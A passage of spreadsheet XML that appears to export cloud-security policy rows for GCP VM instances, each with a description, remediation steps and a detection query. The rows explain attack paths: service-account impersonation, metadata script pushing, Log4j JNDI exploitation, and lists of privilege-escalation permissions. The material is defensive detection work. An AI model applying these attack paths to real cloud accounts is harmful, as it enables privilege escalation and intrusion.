      <c r="G2822" t="b">
        <v>1</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2822" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2822" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable GCP VM instance [Linux Kernel, CVE-2022-0847]</t>
        </is>
      </c>
      <c r="L2822" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2822" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2822" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2822" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2822" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2822" t="inlineStr"/>
      <c r="R2822" t="inlineStr"/>
      <c r="S2822" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2822" t="b">
        <v>0</v>
      </c>
      <c r="U2822" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2822" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2822" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-0847].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Linux [CVE-2022-0847] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X2822"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CVE-2022-0847
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0847</t>
        </is>
      </c>
      <c r="Y2822" t="inlineStr"/>
      <c r="Z2822" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-0847'))</t>
        </is>
      </c>
      <c r="AA2822" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2822" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2822" t="inlineStr"/>
      <c r="AD2822" t="b">
        <v>1</v>
      </c>
      <c r="AE2822" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2822" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>e8f1c2ec-08ec-47f1-b0d4-e27592bb3a74</t>
        </is>
      </c>
      <c r="AI2822" t="inlineStr">
        <is>
          <t>ee6a0907-8f1c-488f-ba18-0ae96aac6744</t>
        </is>
      </c>
      <c r="AJ2822" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2822" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2823">
      <c r="A2823" t="inlineStr"/>
      <c r="B2823" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2823" s="2" t="inlineStr"/>
      <c r="D2823" t="inlineStr"/>
      <c r="E2823" t="inlineStr"/>
      <c r="F2823" t="inlineStr"/>
      <c r="G2823" t="b">
        <v>1</v>
      </c>
      <c r="H28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23" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2823" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2823" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable GCP VM instance with GCP Cloud Run Job Public Execution permissions</t>
        </is>
      </c>
      <c r="L2823" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2823" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2823" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2823" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2823" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2823" t="inlineStr"/>
      <c r="R2823" t="inlineStr"/>
      <c r="S2823" t="inlineStr"/>
      <c r="T2823" t="b">
        <v>0</v>
      </c>
      <c r="U2823" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2823" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2823" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have GCP Cloud Run Job Public Execution permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to gain initial access to the instance. A GCP VM instance with GCP Cloud Run Job Public Execution permissions, along with Service Account impersonation privileges, would be able to escalate their permissions by setting execution permissions on a Job Run that performs attacker-controlled actions using the permissions of an impersonated Service Account. 
This policy checks for the following Cloud Function permissions:
'run.jobs.setIamPolicy', 'iam.serviceAccounts.actAs'
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2823"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23" t="inlineStr"/>
      <c r="Z2823" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ( 'gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Cloud Run Job Public Execution via Default Compute SA Modification') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2823" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2823" t="inlineStr">
        <is>
          <t>2024-08-19 06:33:21</t>
        </is>
      </c>
      <c r="AC2823" t="inlineStr"/>
      <c r="AD2823" t="b">
        <v>1</v>
      </c>
      <c r="AE2823" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2823" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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23" t="inlineStr">
        <is>
          <t>41c82c30-52c7-4900-9a58-74772b9c09eb</t>
        </is>
      </c>
      <c r="AI2823" t="inlineStr">
        <is>
          <t>b4cbd1e1-fb05-44c8-a0f7-9b72593c356e</t>
        </is>
      </c>
      <c r="AJ2823" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2823" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2824">
      <c r="A2824" t="inlineStr"/>
      <c r="B2824" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2824" s="2" t="inlineStr"/>
      <c r="D2824" t="n">
        <v>286</v>
      </c>
      <c r="E2824" t="n">
        <v>0</v>
      </c>
      <c r="F2824" t="n">
        <v>38</v>
      </c>
      <c r="G2824" t="b">
        <v>1</v>
      </c>
      <c r="H28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24" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2824" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2824" t="inlineStr">
        <is>
          <t>Project-Wide Lateral Movement risk due to a publicly exposed and vulnerable GCP VM instance with update instance metadata permission</t>
        </is>
      </c>
      <c r="L2824" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2824" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2824" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2824" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2824" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2824" t="inlineStr"/>
      <c r="R2824" t="inlineStr"/>
      <c r="S2824" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2824" t="b">
        <v>0</v>
      </c>
      <c r="U2824" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2824" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2824" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed and vulnerable GCP VM instances with update instance metadata permission.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. GCP VM instance with update instance metadata permission allows attacker to set instance metadata for all VMs in the project by pushing malicious scripts. 
This policy checks for the following Cloud Function permissions:
'compute.projects.setCommonInstanceMetadata'
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2824"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24" t="inlineStr"/>
      <c r="Z2824" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ( 'gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Project-Wide Lateral Movement via SSH Key Modification for VMs') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2824" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2824" t="inlineStr">
        <is>
          <t>2024-08-19 06:33:22</t>
        </is>
      </c>
      <c r="AC2824" t="inlineStr"/>
      <c r="AD2824" t="b">
        <v>1</v>
      </c>
      <c r="AE2824" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2824" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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24" t="inlineStr">
        <is>
          <t>c414ee96-e8ee-4cfa-936f-32980b6719ea</t>
        </is>
      </c>
      <c r="AI2824" t="inlineStr">
        <is>
          <t>2171907b-f483-472a-a49d-a55386d1d930</t>
        </is>
      </c>
      <c r="AJ2824" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2824" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2825">
      <c r="A2825" t="inlineStr"/>
      <c r="B2825" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2825" s="2" t="inlineStr"/>
      <c r="D2825" t="n">
        <v>751</v>
      </c>
      <c r="E2825" t="n">
        <v>0</v>
      </c>
      <c r="F2825" t="n">
        <v>89</v>
      </c>
      <c r="G2825" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2825" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2825" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed admin ports on GCP VM instance with risky IAM write permissions</t>
        </is>
      </c>
      <c r="L2825" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2825" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2825" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2825" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2825" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2825" t="inlineStr"/>
      <c r="R2825" t="inlineStr"/>
      <c r="S2825" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2825" t="b">
        <v>0</v>
      </c>
      <c r="U2825" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2825" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2825" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky IAM write permissions.
Risky permissions on publicly exposed VM instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to get initial access to the instance. The risky IAM write permissions on the instance further help the attackers to escalate their privilege and perform unauthorized IAM actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'accessapproval.requests.approve', 'accessapproval.requests.dismiss', 'accessapproval.settings.delete', 'accessapproval.settings.update', 'accesscontextmanager.accessLevels.create', 'accesscontextmanager.accessLevels.delete', 'accesscontextmanager.accessLevels.replaceAll', 'accesscontextmanager.accessLevels.update', 'accesscontextmanager.accessPolicies.create', 'accesscontextmanager.accessPolicies.delete', 'accesscontextmanager.accessPolicies.setIamPolicy', 'accesscontextmanager.accessPolicies.update', 'accesscontextmanager.gcpUserAccessBindings.create', 'accesscontextmanager.gcpUserAccessBindings.delete', 'accesscontextmanager.gcpUserAccessBindings.update', 'accesscontextmanager.policies.create', 'accesscontextmanager.policies.delete', 'accesscontextmanager.policies.setIamPolicy', 'accesscontextmanager.policies.update', 'iam.roles.create', 'iam.roles.delete', 'iam.roles.undelete',  'iam.roles.update', 'iam.serviceAccounts.getAccessToken', 'iam.serviceAccountKeys.create', 'iam.serviceAccountKeys.delete', 'iam.serviceAccounts.create', 'iam.serviceAccounts.delete', 'iam.serviceAccounts.disable', 'iam.serviceAccounts.enable', 'iam.serviceAccounts.setIamPolicy', 'iam.serviceAccounts.undelete', 'iam.serviceAccounts.update', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.actAs', 'compute.backendServices.setIamPolicy', 'compute.disks.removeResourcePolicies', 'compute.disks.setIamPolicy', 'compute.firewallPolicies.setIamPolicy', 'compute.globalOperations.setIamPolicy', 'compute.images.setIamPolicy', 'compute.instanceTemplates.setIamPolicy', 'compute.instances.removeResourcePolicies', 'compute.instances.setIamPolicy', 'compute.instances.setServiceAccount', 'compute.machineImages.setIamPolicy', 'compute.maintenancePolicies.setIamPolicy', 'compute.snapshots.setIamPolicy'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the VM instance. Restrict public exposure of admin ports reported for the VM instances as soon as possible.\"</t>
        </is>
      </c>
      <c r="X282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to ports (tcp/22, tcp/3389)
7. Select 'EDIT' under 'Source IPv4 ranges' remove (0.0.0.0/0) and add to the trusted IP address
8. Click 'Save rules' to apply the changes
[PERMISSION]
Remediation steps:
1. Log in to the GCP console
2. Navigate to the Compute Engine instance 
3. Find the service account used by the Compute Engine instance
4. Navigate to the IAM service
5. Find the binding between the service account used by the Compute Engine instance and the role with risky permissions
6. Remove the binding
7. Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y2825" t="inlineStr"/>
      <c r="Z2825" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('GCP VM instance with network path from the internet (0.0.0.0/0) on Admin ports','GCP Compute Engine with IAM write access level')</t>
        </is>
      </c>
      <c r="AA2825" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2825" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:09</t>
        </is>
      </c>
      <c r="AC2825" t="inlineStr"/>
      <c r="AD2825" t="b">
        <v>1</v>
      </c>
      <c r="AE2825" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2825" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>a2b3e4a7-e03f-4f9e-93a6-9ffcb80ace93</t>
        </is>
      </c>
      <c r="AI2825" t="inlineStr">
        <is>
          <t>90c3ce03-3b5d-408b-8c97-f0c1061d5bcf</t>
        </is>
      </c>
      <c r="AJ2825" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2825" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2826">
      <c r="A2826" t="inlineStr"/>
      <c r="B2826" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2826" s="2" t="inlineStr"/>
      <c r="D2826" t="inlineStr"/>
      <c r="E2826" t="inlineStr"/>
      <c r="F2826" t="inlineStr"/>
      <c r="G2826" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2826" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2826" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (Apache APISIX, CVE-2022-24112)</t>
        </is>
      </c>
      <c r="L2826" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2826" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2826" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2826" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2826" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2826" t="inlineStr"/>
      <c r="R2826" t="inlineStr"/>
      <c r="S2826" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2826" t="b">
        <v>0</v>
      </c>
      <c r="U2826" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2826" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2826" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-24112).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Apache APISIX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Apache APISIX (CVE-2022-24112) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X282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CVE-2022-24112
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-24112</t>
        </is>
      </c>
      <c r="Y2826" t="inlineStr"/>
      <c r="Z2826" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-24112'))</t>
        </is>
      </c>
      <c r="AA2826" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2826" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:08</t>
        </is>
      </c>
      <c r="AC2826" t="inlineStr"/>
      <c r="AD2826" t="b">
        <v>1</v>
      </c>
      <c r="AE2826" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2826" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>deff9fe6-2535-4883-bb85-bc91671162ec</t>
        </is>
      </c>
      <c r="AI2826" t="inlineStr">
        <is>
          <t>a033c548-da87-4981-a79e-458f57b49df7</t>
        </is>
      </c>
      <c r="AJ2826" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2826" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2827">
      <c r="A2827" t="inlineStr"/>
      <c r="B2827" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2827" s="2" t="inlineStr"/>
      <c r="D2827" t="inlineStr"/>
      <c r="E2827" t="inlineStr"/>
      <c r="F2827" t="inlineStr"/>
      <c r="G2827" t="b">
        <v>1</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2827" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2827" t="inlineStr">
        <is>
          <t>Potential risk of remote code execution due to vulnerable Log4j and public exposure on ports 80/443 on GCP VM Instance [Apache Log4j, CVE-2021-44228, CVE-2021-45046]</t>
        </is>
      </c>
      <c r="L2827" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2827" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2827" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2827" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2827" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2827" t="inlineStr"/>
      <c r="R2827" t="inlineStr"/>
      <c r="S2827" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2827" t="b">
        <v>0</v>
      </c>
      <c r="U2827" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2827" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2827" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are exposed to 80/443 ports Log4Shell vulnerabilities [Apache Log4j, CVE-2021-44228, CVE-2021-45046].
The Log4j vulnerability allows remote attackers to execute arbitrary code on a target system by exploiting a flaw in the library's handling of JNDI (Java Naming and Directory Interface) lookups. Specifically, it occurs due to improper input validation when processing user-supplied data in log messages. Attackers can craft specially crafted log messages that trigger a JNDI lookup to a malicious server controlled by them. This can lead to remote code execution on the affected system, making it a severe security issue. The fact the common web server ports 80/443 open to internet makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to restrict the public exposure of the affected GCP VM instance and remediate the Apache Log4j [CVE-2021-44228, CVE-2021-45046] vulnerabilities.</t>
        </is>
      </c>
      <c r="X2827"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to ports (http/80, https/443)
7. Select 'EDIT' under 'Source IPv4 ranges' remove (0.0.0.0/0) and add to the trusted IP address
8. Click 'Save rules' to apply the changes
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2021-44228
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-44228
   https://nvd.nist.gov/vuln/detail/CVE-2021-45046</t>
        </is>
      </c>
      <c r="Y2827" t="inlineStr"/>
      <c r="Z2827" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('GCP VM instance with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2021-44228','CVE-2021-45046'))</t>
        </is>
      </c>
      <c r="AA2827" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2827" t="inlineStr">
        <is>
          <t>2023-11-10 07:02:51</t>
        </is>
      </c>
      <c r="AC2827" t="inlineStr"/>
      <c r="AD2827" t="b">
        <v>1</v>
      </c>
      <c r="AE2827" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2827" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>55830755-a547-480e-b98e-429ab1c15e98</t>
        </is>
      </c>
      <c r="AI2827" t="inlineStr">
        <is>
          <t>8b40f708-c920-44f6-84bd-9000eca9837d</t>
        </is>
      </c>
      <c r="AJ2827" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2827" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2828">
      <c r="A2828" t="inlineStr"/>
      <c r="B2828" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2828" s="2" t="inlineStr"/>
      <c r="D2828" t="inlineStr"/>
      <c r="E2828" t="inlineStr"/>
      <c r="F2828" t="inlineStr"/>
      <c r="G2828" t="b">
        <v>1</v>
      </c>
      <c r="H28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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2828" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2828" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (Microsoft Message Queuing (MSMQ), CVE-2023-21554)</t>
        </is>
      </c>
      <c r="L2828" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2828" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2828" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2828" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2828" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2828" t="inlineStr"/>
      <c r="R2828" t="inlineStr"/>
      <c r="S2828" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2828" t="b">
        <v>0</v>
      </c>
      <c r="U2828" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2828" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2828" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-21554).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Microsoft Message Queuing (MSMQ)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Microsoft Message Queuing (MSMQ) (CVE-2023-21554) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X282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CVE-2023-21554
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-21554</t>
        </is>
      </c>
      <c r="Y2828" t="inlineStr"/>
      <c r="Z2828" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-21554'))</t>
        </is>
      </c>
      <c r="AA2828" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2828" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:16</t>
        </is>
      </c>
      <c r="AC2828" t="inlineStr"/>
      <c r="AD2828" t="b">
        <v>1</v>
      </c>
      <c r="AE2828" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2828" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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8" t="inlineStr">
        <is>
          <t>dbf6b488-167a-40a7-b413-1d3f26078624</t>
        </is>
      </c>
      <c r="AI2828" t="inlineStr">
        <is>
          <t>1fdaae66-5467-4093-9382-e91d7d187587</t>
        </is>
      </c>
      <c r="AJ2828" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2828" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2829">
      <c r="A2829" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Rehan, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, CIS v3.0.0 (GCP) Level 2, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, SOC 2, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, Brazilian Data Protection Law (LGPD), Insurance Regulatory And Development Authority Of India, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS v2.0.0 (GCP) Level 2, CIS Controls v8, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CIS v1.1.0 (GCP), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, NIST CSF, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, ITSG-33, NIST CSF, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, PCI DSS v3.2.1, CIS v1.3.0 (GCP), kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, 